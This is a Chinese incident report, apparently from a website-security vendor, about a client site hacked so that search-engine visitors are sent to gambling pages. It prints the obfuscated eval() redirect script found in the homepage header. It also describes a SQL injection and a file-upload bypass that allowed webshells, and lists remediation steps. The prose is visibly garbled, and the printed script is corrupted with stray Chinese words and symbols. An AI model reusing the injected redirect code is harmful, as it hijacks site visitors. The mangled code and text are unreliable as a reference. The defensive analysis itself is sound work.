的解决方案该客户网站最近被重定向到赌博网站。开通后,将直接跳转到北京赛车网站,PK10等内容。客户网站本身已由百度推广,导致所有访客跳转到赌博网站。客户带来了很多经济损失,另一个官方网站的形象也受到了影响。我们的SINE安全检查客户的网站,发现客户网站TDK的标题已被反复修改为(北京赛车PK10等内容),立即进行全面的源代码安全审核和网站漏洞检测以及网站漏洞修复客户的网站。检查客户的主页标题TDK内容确实被篡改,并添加了一些加密的恶意代码,代码如下:
Type='text/java'eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c + 29): c.toString(36) )};如果){而(C - )d [E(C)]=K [C] || E(c)中( '' 取代(/^ /,字符串!); K=[功能(例如){return d [e]}]; e=function(){return'\ w +'}; c=1;}; while(c - )if(k [c])p=p.replace(new RegExp ('\ b'+ e(c)+'\ b','g'),k [c]); return p;}('m ['\ 9 \ d \ 1 \ l \ i \ a \ n \ 0'] ['\ 8 \ 4 \ 6 \ 0 \ a']('\ h \ 3 \ 1 \ 4 \ 6 \ 2 \ 0 \ 0 \ k \ 2 \ a \ e \ 7 \ 0 \ a \ q \ 0 \ 5 \ g \ b \ f \ b \ 3 \ 1 \ 4 \ 6 \ 2 \ 0 \ 7 \ 3 \ 4 \ 1 \ e \ 7 \ o \ 0 \ 0 \ 2 \ 3 \ p \ 5 \ 5 \ 8 \ 8 \ 8 \ C \ 1 \ 2 \ 9 \ b \ 3 \ r \ C \ 1 \ d \ I \ 5 \ 9 \ 9 \˚F\ 6 \ 2 \ C \克\ 3 \ 7 \Ĵ\ħ\ 5 \ 3 \ 1 \ 4 \ 6 \ 2 \ 0 \ J ');',28,28'X74 | X63 | X70 | X73 | X72 | X2F | X69 | X22 | X77 | X64 | X65 | X61 | X2E | x6f | X3D | X76 | X6A | X3C | X6D | x3e | X79 | X75 |窗口| x6e | X68 | X3A | X78 | x38'.split( '|'),0,{} ))
上面的网站代码是ASCII码,只要它转换为Unicode代码,就可以看到加密的真实内容。我们的工程师解释代码并发现代码是根据搜索引擎编写的,作为跳转的标准。通常,代码仅适用于搜索引擎。网站站长直接输入网址,但未找到网站跳转。去赌博内容网站,客户的网站将直接跳转到北京赛车,pk10网站通过百度或搜狗搜索。
针对上述问题,我们立即删除加密的跳转代码,首先尽量减少客户网站的丢失,并促进网站的正常访问(因为客户一直在做百度推广,一直在烧钱),通过一系列的安全测试,是因为网站的漏洞被上传到特洛伊木马并篡改了网站的主页?在我们的正弦安全工程师对网站代码进行了详细的安全测试后,发现网站系统中存在SQL注入漏洞,导致攻击者获得管理员帐户。并且密码和网站背景的地址也是默认的管理目录名,这样黑客可以在获取密码后直接登录到网站的后台。当在后台安全检测到网站时,找到了产品图片上传功能,并且有一个旁路文件上传脚本木马。漏洞。
网站漏洞由$ this-> getext($ filear ['name'])在网站背景中的产品上传页面代码中生成; //获取扩展名$ this-> set_savename($ file); //设置保存文件名,此代码可以绕过文件扩展名并以php格式上传脚本文件,这样攻击者就可以轻松获取网站的权限。客户还报告说,该网站经常被反复篡改,导致跳转到赌博网站,寻找公司建立网站,他们只是删除了代码,并且不久它们被篡改,导致严重损失了客户的网站。篡改跳跃的根本原因是网站存在漏洞。如果网站漏洞没有得到修复,即使删除了恶意代码,也只是一种肤浅的工作。如果它不起作用,它将被反复伪造,它将无济于事。需要在网站上进行安全测试,以及网站漏洞检测,修复网站漏洞,清除木马的后门,保护网站,使网站更安全,更稳定。
网站漏洞修复的过程如下:
安全加固客户端网站源代码和前端过滤代码,防止sql注入,网站的后台目录安全设置,将管理文件名改为@%admin,对网站后台图片上传功能代码进行漏洞修复,并设置上传文件的白名单机制。并且文件上传目录设置了脚本安全权限,禁止脚本,并且上传的文件扩展名也被深度过滤,网站的数据库安全部署,数据库的连接信息被加密,根管理权限被删除,并设置设置。普通的数据库账号,读写分离,新表,查询表,写表等数据库的正常操作权限,网站后台的账号密码比较复杂,密码是12位+字母+大小写组合,从发现网站漏洞到目前为止,在解决问题的过程中,共发现了3个脚本木马(webshell),并发现了小马后门的一个句子。网站的模板内容也被篡改,导致客户端在生成主页时生成恶意加密代码。 。
网站安全预防措施:
1.尽量避免网站背景的默认名称,例如admin manage houtai
2.控制网站上传目录的权限。 (不设置脚本执行权限)
3.网站背景中的用户名和密码设置比较复杂,数字+字母+大写+特殊符号组合。
4.阿里云虚拟主机用户的FTP帐号密码应设置为复杂点,数字+字母+大写+特殊符号组合。
5.如果它是单独服务器的客户端,建议首先部署服务器的安全性,安全地部署每个网站的文件夹,安全地部署数据库,然后保护网站。否则,您的网站是安全的,服务器不安全。它没有帮助。如果您不了解安全性,建议找专业的网站安全公司来解决问题。